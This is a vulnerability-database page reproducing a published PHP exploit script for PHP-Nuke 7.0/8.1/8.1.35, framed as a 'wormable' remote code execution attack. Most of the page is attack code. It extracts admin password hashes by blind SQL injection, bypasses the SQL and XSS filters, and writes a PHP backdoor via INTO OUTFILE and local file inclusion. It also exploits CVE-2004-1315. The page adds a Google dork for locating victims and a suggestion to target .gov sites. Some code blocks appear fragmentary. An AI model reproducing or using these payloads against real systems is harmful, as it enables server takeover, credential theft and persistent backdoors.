Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35 by Michael Brook
Reporter | Title | Published | Views | Family All 27 |
![]() | PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution | 5 May 201000:00 | β | exploitdb |
![]() | phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit) | 3 Jul 201000:00 | β | exploitdb |
![]() | phpBB viewtopic.php highlight Parameter SQL Injection (ESMARKCONANT) | 22 Nov 200400:00 | β | nessus |
![]() | phpBB < 2.0.11 Multiple Vulnerabilities (ESMARKCONANT) | 18 Jan 200500:00 | β | nessus |
![]() | GLSA-200411-32 : phpBB: Remote command execution | 24 Nov 200400:00 | β | nessus |
![]() | FreeBSD : phpbb -- arbitrary command execution and other vulnerabilities (e3cf89f0-53da-11d9-92b7-ceadd4ac2edd) | 13 Jul 200500:00 | β | nessus |
![]() | Gentoo Security Advisory GLSA 200411-32 (phpBB) | 24 Sep 200800:00 | β | openvas |
![]() | Gentoo Security Advisory GLSA 200411-32 (phpBB) | 24 Sep 200800:00 | β | openvas |
![]() | FreeBSD Ports: phpbb | 4 Sep 200800:00 | β | openvas |
![]() | FreeBSD Ports: phpbb | 4 Sep 200800:00 | β | openvas |
Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35(newist as of release)
Vendor's Website:http://phpnuke.org/
Secuirty Researcher: Michael Brooks (https://sitewat.ch)
Original Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html
Google hack:
"Francisco Burzi" "Page Generation:" Seconds inurl:modules.php
1,170,000 results
add inurl:gov to the google hack if you want to make the news ;)
Works with maigic_quotes_gpc=On or Off
Works with AppArmor and Suhosin Hadend-PHP, tested on Ubuntu 9.04 and 10.04
My own LFI+SQLI attack is used to bypass AppArmor!
Also tested XAMPP on Windows XP
All tests where done with MySQL5 and PHP5
To obtain a user's cookie:
1) Register a normal account
2) Login
3) Type this into the same address bar and hit enter: javascript:document.cookie
To set a cookie you can do use this: javascript:document.cookie="admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"
//The blind_sql_injeciton calss is a general exploit framework that we are inheriting.
class php_nuke_blind_sql_injection extends blind_sql_injection {
//This is the blind sql injection request.
function query($check){
//Rate limiter to bypass ipban.php's protection.
//Must stay below 5 requests every 2 seconds.
//build the http request to Inject a query:
//This is a simple get request with a custom referer
//$this->set_referer("'="/\*" (select ".$check." from nuke_authors limit 1))-- */");
$this->set_referer("'=(select ".$check." from nuke_authors limit 1))-- 1");
/*example get and post request.
*$this->set_get("id=1 or (select ".$check." from nuke_authors limit 1))";//$_GET[id]
*$this->set_post("id=1 or (select ".$check." from nuke_authors limit 1))");//$_POST[id]
//This is a very efficient blind sql injection class.
class blind_sql_injection{
var $url, $backup_url, $result, $http, $request_count, $timeout;
function blind_sql_injection($url,$timeout=10){
$this->http=new http_client();
function set_get($get){
function set_referer($referer){
function set_post($post){
function test_target(){
return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");
function num_to_hex($arr){
foreach($arr as $a){
return $ret;
//Looking for a string of length 32 and base 16 in ascii chars.
function find_md5($column){
return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));
function find_sha1($column){
return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));
//Look for an ascii string of arbitrary length.
function find_string($column){
//A length of zero means we are looking for a null byte terminated string.
foreach($result as $r){
return $ret;
//query() is a method that generates the sql injection request
function query($check){
//This function must be overridden.
function recheck($result,$question,$base){
//Force a long timeout.
foreach($result as $r){
function linear_finder($base,$length,$question){
#Binary search for mysql based sql injection.
function bin_finder($base,$length,$question){
$pos= $low+(($high-$low)/2);
#asking the sql database if the current value is greater than $pos
#if this is true then the value must be the modulus.
#asking the sql database if the current value is less than $pos
}else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
#if this is true the value must be zero, or in the case of ascii, a null byte.
#We have found the null terminator so we have finnished our search for a string.
#both greater than and less then where asked, so so then the answer is our guess $pos.
return $result;
//Fire off the request
function send($quesiton){
//build the injected query.
//backup_url is for set_get()
return (time()-$start>=$this->timeout);
//retroGod RIP
function charEncode($string){
return $char;
//General purpose http client that works on a default php install.
class http_client{
var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';
function send($loc){
//overload function polymorphism between gets and posts
$fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );
$fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );
if( !$fp ) {
print "$errstr ($errno)<br>\nn";
return false;
} else {
if( $this->postdata=='' ) {
$request="GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
} else {
$request="POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
$request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\r\n\r\n";
$request.="Host: ".$url['host'].":".$url['port']."\r\n";
$request.="User-Agent: ".$ua."\r\n";
$request.="Accept: text/plain\r\n";
$request.="Referer: ".$this->referer."\r\n";
$request.="Connection: Close\r\n";
$request.="Cookie: ".$this->cookie."\r\n" ;
if( $this->postdata!='' ) {
$strlength = strlen( $this->postdata );
$request.="Content-type: application/x-www-form-urlencoded\r\n" ;
$request.="Content-length: ".$strlength."\r\n\r\n";
fputs( $fp, $request."\r\n\r\n" );
while( !feof( $fp ) ) {
$output .= fgets( $fp, 1024 );
fclose( $fp );
//php_nuke only:
if(strstr($output,"too many page loads")){
print "REQUEST CAP HIT!\n";
print "REQUEST CAP HIT!\n";
return $output;
//Use a http proxy
function proxy($proxy){ //user:pass@ip:port
//Parses the results from a PHP error to use as a path disclosure.
function getPath($url,$pops=1){
//Regular error reporting:
$resp=explode("array given in <b>",$html);
$resp = explode("</b>",$resp[1]);
//xdebug's error reporting:
$resp=explode("array given in ",$html);
$resp = explode(" ",$resp[1]);
//Can't use dirname()
return $path;
//Grab the server type from the http header.
function getServer($url){
$header=explode("Server: ",$resp);
return $server[0];
function main(){
//This is only useful for debugging, so its not listed in the useage.
print("Useage: ./php_exploit -t http://localhost\n");
die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
$http=new http_client();
$sex=new php_nuke_blind_sql_injection($attack_url."/");
//This is what a cookie looks like:
print "Using cookie...\n";
//1337+30000 is used as a pivot in parsing, and to test for a sucessful injection.
//This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off.
$http->postdata="title=wow\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
//This part of the exploit is a bit strange sorry for the mess, gotta realease!
$http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
//Find the primary key of the journal entry we just created.
//we should have the single quote that we escaped at the end of wow'
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
$http->postdata="title=wow\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$inj=explode("Last updated on ",$response);
$inj=explode(" @ ",$inj[1]);
//Find the primary key of the journal entry we just created.
//we should have the single quote that we escaped at the end of wow'
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
die("target has patched!\n");
print "Target vulnerable to a privilege escalation attack!!!\n";
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
print "Starting Attack Against:".$attack_url."/\n";
print "Testing for blind sql injection...\n";
print("Target might be running 8.1.35\n");
print("Try the privilege esciation attack to upload the shell:");
die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
print "Target is vulnerable to blind sql injection!!!\n";
print "Please Standby For Attack...\n";
print "attacked used:".$sex->request_count." requests.\n";
print "Found Admin's name:".$user_name."\n";
print "Found MD5 Password hash:".$pass_hash."\n";
print "Using Admin Session ID:\n".$admin_cookie."\n";
//This request will tell us what version of php-nuke it is.
//If it is 8, Then the page gives us configuration information to perserve.
if(!strstr($admin_options,"Content-Length: 0")){
print "PHP-Nuke 8 detected.\n";
//Parsing out and storing configuration values to restore them after the hack.
foreach( $option_values as $value){
//Enable error reporting
//Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].
print "Windows box detected.\n";
print "Remote path:$remote_path\n";
print "Uploading backdoor...\n";
//Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
$http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");
//Disable error reporting
print "*nix box detected.\n";
print "Remote path:$remote_path\n";
//Is mysql on the same machine as the httpd?
$http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1");
if(strstr($mysql_check,"User Doesn't Exists!")){
print("MySQL isn't on the same machine or you do not have file privileges.\n");
die("Remote code execution failed\n");
print "Uploading backdoor...\n";
//Grab the theme, this is needed to repair the database after the LFI
//Repair the database after the LFI.
$backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");';
//This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
//Install the backdoor in a relitive directory.
$backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
//charEncode is used to bypass XSS filters.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
$http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
//local file include vulnerablity to execute /tmp/theme.php
//Fire off a get request to trigger the uploaded php file using LFI
//Try the LFI again, just in case.
//test if the backdoor works, try and clean up after the exploit.
$test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
print "Backdoor install failed!\n";
////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
print "PHP-Nuke 7 detected.\n";
$http->postdata="";//send get requests.
//Fire off a check for CVE-2004-1315, phpbb maybe installed.
//This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527
//php-nuke was not vulnerable to this because of mainfile line 50: \([^>]*"?[^)]*\)
//to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527
//if the exploit didn't work, then we might have to enable phpbb and populate it.
//Enalbe PHPBB
//create a new category for phpbb
//create a new form in the new category
//create a new topic in the new form
//access the first topic.
//Check to see if any of the first 10 topics are exploitable.
//Fire off a check for CVE-2004-1315.
//Check if we where able to hit CVE-2004-1315.
print("Remote Code execution tested successfully:\n".$attack_url."/modules.php?name=Forums&file=viewtopic&t=".--$t."&highlight=%2527.phpinfo%2528%2529.%2527\nThis is a Doulbe urlencode()\n");
print("Remote code execution has failed!\n");
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo